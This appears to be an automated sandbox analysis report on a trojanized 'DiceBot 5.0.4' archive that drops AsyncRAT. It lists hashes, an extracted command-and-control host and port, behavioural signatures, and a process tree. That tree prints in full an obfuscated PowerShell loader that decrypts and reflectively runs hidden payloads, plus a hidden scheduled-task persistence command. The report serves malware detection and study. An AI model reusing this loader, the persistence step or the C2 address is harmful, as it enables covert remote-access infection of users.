Overview
overview
10Static
static
3DiceBot.5.0.4.zip
windows7-x64
7DiceBot.5.0.4.zip
windows10-2004-x64
1DiceBot 5.....4.exe
windows7-x64
1DiceBot 5.....4.exe
windows10-2004-x64
10DiceBot 5....ox.dll
windows7-x64
1DiceBot 5....ox.dll
windows10-2004-x64
1DiceBot 5....nt.dll
windows7-x64
1DiceBot 5....nt.dll
windows10-2004-x64
1DiceBot 5....on.dll
windows7-x64
1DiceBot 5....on.dll
windows10-2004-x64
1DiceBot 5....PI.dll
windows7-x64
1DiceBot 5....PI.dll
windows10-2004-x64
1DiceBot 5....SE.txt
windows7-x64
1DiceBot 5....SE.txt
windows10-2004-x64
1DiceBot 5....nt.dll
windows7-x64
1DiceBot 5....nt.dll
windows10-2004-x64
1DiceBot 5....in.dll
windows7-x64
1DiceBot 5....in.dll
windows10-2004-x64
1DiceBot 5....on.dll
windows7-x64
1DiceBot 5....on.dll
windows10-2004-x64
1DiceBot 5....pt.dll
windows7-x64
3DiceBot 5....pt.dll
windows10-2004-x64
3DiceBot 5....ua.dll
windows7-x64
1DiceBot 5....ua.dll
windows10-2004-x64
1DiceBot 5....ne.dll
windows7-x64
1DiceBot 5....ne.dll
windows10-2004-x64
1DiceBot 5....rs.dll
windows7-x64
1DiceBot 5....rs.dll
windows10-2004-x64
1DiceBot 5....te.dll
windows7-x64
1DiceBot 5....te.dll
windows10-2004-x64
1DiceBot 5....ll.xml
windows7-x64
3DiceBot 5....ll.xml
windows10-2004-x64
1Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-01-2025 20:59
Static task
static1
Behavioral task
behavioral1
Sample
DiceBot.5.0.4.zip
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DiceBot.5.0.4.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
DiceBot 5.0.4/DiceBot 5.0.4.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
DiceBot 5.0.4/DiceBot 5.0.4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
DiceBot 5.0.4/FastColoredTextBox.dll
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
DiceBot 5.0.4/FastColoredTextBox.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
DiceBot 5.0.4/GraphQL.Client.dll
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
DiceBot 5.0.4/GraphQL.Client.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
DiceBot 5.0.4/GraphQL.Common.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
DiceBot 5.0.4/GraphQL.Common.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
DiceBot 5.0.4/JDCAPI.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
DiceBot 5.0.4/JDCAPI.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
DiceBot 5.0.4/LICENSE.txt
Resource
win7-20240729-en
Behavioral task
behavioral14
Sample
DiceBot 5.0.4/LICENSE.txt
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
DiceBot 5.0.4/Microsoft.AspNet.SignalR.Client.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
DiceBot 5.0.4/Microsoft.AspNet.SignalR.Client.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
DiceBot 5.0.4/NBitcoin.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
DiceBot 5.0.4/NBitcoin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
DiceBot 5.0.4/Newtonsoft.Json.dll
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
DiceBot 5.0.4/Newtonsoft.Json.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
DiceBot 5.0.4/Noesis.Javascript.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
DiceBot 5.0.4/Noesis.Javascript.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
DiceBot 5.0.4/SharpLua.dll
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
DiceBot 5.0.4/SharpLua.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
DiceBot 5.0.4/SuperSocket.ClientEngine.dll
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
DiceBot 5.0.4/SuperSocket.ClientEngine.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
DiceBot 5.0.4/System.Buffers.dll
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
DiceBot 5.0.4/System.Buffers.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
DiceBot 5.0.4/System.Data.SQLite.dll
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
DiceBot 5.0.4/System.Data.SQLite.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
DiceBot 5.0.4/System.Data.SQLite.dll.xml
Resource
win7-20241023-en
Behavioral task
behavioral32
Sample
DiceBot 5.0.4/System.Data.SQLite.dll.xml
Resource
win10v2004-20241007-en
General
-
Target
DiceBot 5.0.4/DiceBot 5.0.4.exe
-
Size
178KB
-
MD5
109ffbefe8cccafc6db7276baa45be0f
-
SHA1
df7300d951756013db8b820ce4b4044559fe83d1
-
SHA256
647de53b1d9e75ec2ff48838924ddd00799d05c0d61af111a842a59621a90f7c
-
SHA512
13af9f6925cb22bb2b4c644e6737d37e508c1a53677942619c415265e4a9b699769df7406d6409dad5198c428bf66c54cf33490a2b98450546b73a68422793d5
-
SSDEEP
768:mj+HObZiwMBp7jlP9LWJz9AktYcF2l1x6KOFn60KS:m9bZi7B0QY21xlOFn60KS
Malware Config
Extracted
asyncrat
AsyncRAT
Stake
powershellcmd.theworkpc.com:111
AsyncMutex_bloxstrap
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral4/memory/3464-89-0x00000000075B0000-0x00000000075C6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 15 3464 powershell.exe 33 3464 powershell.exe 88 3464 powershell.exe 93 3464 powershell.exe 96 3464 powershell.exe 98 3464 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3772 powershell.exe 1580 powershell.exe 3464 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation DiceBot 5.0.4.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4664 2648 WerFault.exe 86 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language render.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings DiceBot 5.0.4.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2596 DiceBot 5.0.4.exe 1580 powershell.exe 1580 powershell.exe 3772 powershell.exe 3772 powershell.exe 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2596 DiceBot 5.0.4.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeIncreaseQuotaPrivilege 3772 powershell.exe Token: SeSecurityPrivilege 3772 powershell.exe Token: SeTakeOwnershipPrivilege 3772 powershell.exe Token: SeLoadDriverPrivilege 3772 powershell.exe Token: SeSystemProfilePrivilege 3772 powershell.exe Token: SeSystemtimePrivilege 3772 powershell.exe Token: SeProfSingleProcessPrivilege 3772 powershell.exe Token: SeIncBasePriorityPrivilege 3772 powershell.exe Token: SeCreatePagefilePrivilege 3772 powershell.exe Token: SeBackupPrivilege 3772 powershell.exe Token: SeRestorePrivilege 3772 powershell.exe Token: SeShutdownPrivilege 3772 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeSystemEnvironmentPrivilege 3772 powershell.exe Token: SeRemoteShutdownPrivilege 3772 powershell.exe Token: SeUndockPrivilege 3772 powershell.exe Token: SeManageVolumePrivilege 3772 powershell.exe Token: 33 3772 powershell.exe Token: 34 3772 powershell.exe Token: 35 3772 powershell.exe Token: 36 3772 powershell.exe Token: SeIncreaseQuotaPrivilege 3772 powershell.exe Token: SeSecurityPrivilege 3772 powershell.exe Token: SeTakeOwnershipPrivilege 3772 powershell.exe Token: SeLoadDriverPrivilege 3772 powershell.exe Token: SeSystemProfilePrivilege 3772 powershell.exe Token: SeSystemtimePrivilege 3772 powershell.exe Token: SeProfSingleProcessPrivilege 3772 powershell.exe Token: SeIncBasePriorityPrivilege 3772 powershell.exe Token: SeCreatePagefilePrivilege 3772 powershell.exe Token: SeBackupPrivilege 3772 powershell.exe Token: SeRestorePrivilege 3772 powershell.exe Token: SeShutdownPrivilege 3772 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeSystemEnvironmentPrivilege 3772 powershell.exe Token: SeRemoteShutdownPrivilege 3772 powershell.exe Token: SeUndockPrivilege 3772 powershell.exe Token: SeManageVolumePrivilege 3772 powershell.exe Token: 33 3772 powershell.exe Token: 34 3772 powershell.exe Token: 35 3772 powershell.exe Token: 36 3772 powershell.exe Token: SeIncreaseQuotaPrivilege 3772 powershell.exe Token: SeSecurityPrivilege 3772 powershell.exe Token: SeTakeOwnershipPrivilege 3772 powershell.exe Token: SeLoadDriverPrivilege 3772 powershell.exe Token: SeSystemProfilePrivilege 3772 powershell.exe Token: SeSystemtimePrivilege 3772 powershell.exe Token: SeProfSingleProcessPrivilege 3772 powershell.exe Token: SeIncBasePriorityPrivilege 3772 powershell.exe Token: SeCreatePagefilePrivilege 3772 powershell.exe Token: SeBackupPrivilege 3772 powershell.exe Token: SeRestorePrivilege 3772 powershell.exe Token: SeShutdownPrivilege 3772 powershell.exe Token: SeDebugPrivilege 3772 powershell.exe Token: SeSystemEnvironmentPrivilege 3772 powershell.exe Token: SeRemoteShutdownPrivilege 3772 powershell.exe Token: SeUndockPrivilege 3772 powershell.exe Token: SeManageVolumePrivilege 3772 powershell.exe Token: 33 3772 powershell.exe Token: 34 3772 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3464 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2596 wrote to memory of 4380 2596 DiceBot 5.0.4.exe 84 PID 2596 wrote to memory of 4380 2596 DiceBot 5.0.4.exe 84 PID 2596 wrote to memory of 2648 2596 DiceBot 5.0.4.exe 86 PID 2596 wrote to memory of 2648 2596 DiceBot 5.0.4.exe 86 PID 2596 wrote to memory of 2648 2596 DiceBot 5.0.4.exe 86 PID 4380 wrote to memory of 4944 4380 cmd.exe 87 PID 4380 wrote to memory of 4944 4380 cmd.exe 87 PID 4380 wrote to memory of 1580 4380 cmd.exe 88 PID 4380 wrote to memory of 1580 4380 cmd.exe 88 PID 4380 wrote to memory of 1580 4380 cmd.exe 88 PID 1580 wrote to memory of 3772 1580 powershell.exe 92 PID 1580 wrote to memory of 3772 1580 powershell.exe 92 PID 1580 wrote to memory of 3772 1580 powershell.exe 92 PID 1580 wrote to memory of 3580 1580 powershell.exe 96 PID 1580 wrote to memory of 3580 1580 powershell.exe 96 PID 1580 wrote to memory of 3580 1580 powershell.exe 96 PID 3580 wrote to memory of 2680 3580 WScript.exe 97 PID 3580 wrote to memory of 2680 3580 WScript.exe 97 PID 3580 wrote to memory of 2680 3580 WScript.exe 97 PID 2680 wrote to memory of 5112 2680 cmd.exe 99 PID 2680 wrote to memory of 5112 2680 cmd.exe 99 PID 2680 wrote to memory of 5112 2680 cmd.exe 99 PID 2680 wrote to memory of 3464 2680 cmd.exe 100 PID 2680 wrote to memory of 3464 2680 cmd.exe 100 PID 2680 wrote to memory of 3464 2680 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\DiceBot 5.0.4.exe"C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\DiceBot 5.0.4.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\driver.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9a3dmqA7Z/DHdYvQvXDxJB6f7txQiyBVadbPgdWDko0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vXseLiQG8ejGzth94Cz/bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DAOFT=New-Object System.IO.MemoryStream(,$param_var); $BxAQM=New-Object System.IO.MemoryStream; $tsDqC=New-Object System.IO.Compression.GZipStream($DAOFT, [IO.Compression.CompressionMode]::Decompress); $tsDqC.CopyTo($BxAQM); $tsDqC.Dispose(); $DAOFT.Dispose(); $BxAQM.Dispose(); $BxAQM.ToArray();}function execute_function($param_var,$param2_var){ $pDhYm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKlGi=$pDhYm.EntryPoint; $uKlGi.Invoke($null, $param2_var);}$jqCUp = 'C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\driver.bat';$host.UI.RawUI.WindowTitle = $jqCUp;$GNhJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jqCUp).Split([Environment]::NewLine);foreach ($JyGcd in $GNhJC) { if ($JyGcd.StartsWith('KUxGjdLQAzrzMfSYqNGS')) { $mXPBz=$JyGcd.Substring(20); break; }}$payloads_var=[string[]]$mXPBz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_763_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_763.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3772
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_763.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_763.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9a3dmqA7Z/DHdYvQvXDxJB6f7txQiyBVadbPgdWDko0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vXseLiQG8ejGzth94Cz/bQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DAOFT=New-Object System.IO.MemoryStream(,$param_var); $BxAQM=New-Object System.IO.MemoryStream; $tsDqC=New-Object System.IO.Compression.GZipStream($DAOFT, [IO.Compression.CompressionMode]::Decompress); $tsDqC.CopyTo($BxAQM); $tsDqC.Dispose(); $DAOFT.Dispose(); $BxAQM.Dispose(); $BxAQM.ToArray();}function execute_function($param_var,$param2_var){ $pDhYm=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKlGi=$pDhYm.EntryPoint; $uKlGi.Invoke($null, $param2_var);}$jqCUp = 'C:\Users\Admin\AppData\Roaming\Windows_Log_763.bat';$host.UI.RawUI.WindowTitle = $jqCUp;$GNhJC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jqCUp).Split([Environment]::NewLine);foreach ($JyGcd in $GNhJC) { if ($JyGcd.StartsWith('KUxGjdLQAzrzMfSYqNGS')) { $mXPBz=$JyGcd.Substring(20); break; }}$payloads_var=[string[]]$mXPBz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
- System Location Discovery: System Language Discovery
PID:5112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3464
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\render.exe"C:\Users\Admin\AppData\Local\Temp\DiceBot 5.0.4\data\render.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 8883⤵
- Program crash
PID:4664
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2648 -ip 26481⤵PID:3788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
Filesize
20KB
MD527b9d9e1cf6548bf998d4e968b0bd5e7
SHA1b371bb50257cbad5082216b94dfc188374bfa7b5
SHA2569940d709058e28dcb3c1c00119a046d0634ed85ff4a65472df12b05493a06aaa
SHA51286327acb1075eb9302b843cd1a0a4569827c6705d9c7d82b6bf3faa85b95883b2ac4eef00ac0391f0e47e34a0d5b971e8ceb5e49ef65f4d70559464584c1b108
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD517f33919a97f2aef8e0c3319220c5c7e
SHA171d81cd98b31275cd626ff2b219b8ab5149e30ce
SHA256afb0d669166beac060fe834d4d0c593b50b1700e913f81fa8df6533be14c9cbf
SHA5128cc5ed6d9eea9f4f380edecba3265194d6cbf9ad7162c8166f5aea3dee964b5dbf0959f1b5d3bb87222d155428e850c01346af366c8eb07b57ec3975dcf62a5b
-
Filesize
115B
MD5ed96c285ef70baac6ee129024ef330fe
SHA1cef6fefc190afa04804829ccd26a8b68a7c13a66
SHA25655cdaa700babdb6c66c3e9bee7c0ad02c4a3ea4e98413bb24f08f7dc0bd63744
SHA51239ef9404e193963459b01b41e2d8235b4c04d419a71766e5994128c7ee5a03bbaa9fda9f21874f39dc92f2a21082827f85126053d09ce3c112df75d9ee56fd9d